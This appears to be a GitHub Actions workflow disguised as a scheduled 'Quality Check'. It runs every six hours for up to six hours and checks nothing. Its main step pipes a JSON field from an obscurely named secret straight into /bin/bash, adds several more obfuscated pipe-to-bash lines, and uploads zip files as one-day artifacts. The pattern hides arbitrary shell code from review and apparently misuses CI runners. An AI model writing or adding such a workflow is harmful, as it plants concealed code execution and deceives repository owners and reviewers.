name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '35 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          kpawz99: ${{ secrets.kpawz99 }}
        run: |
          printf '%s' "$kpawz99" | jq -r .thnl20733 | /bin/bash
          echo $hf9 | jq -r .y8045 | /bin/bash
          echo $vygq354 | jq -r .isilk241 | /bin/bash
          echo $cbpaa7 | jq -r .olod914 | /bin/bash
          printf '%s' "$key9" | jq -r .wpgq93009 | /bin/bash
          echo $cjbg727 | jq -r .o443 | /bin/bash
          printf '%s' "$fmiz1002" | jq -r .th7 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: LmGlY23t
          path: "*.zip"
          retention-days: 1
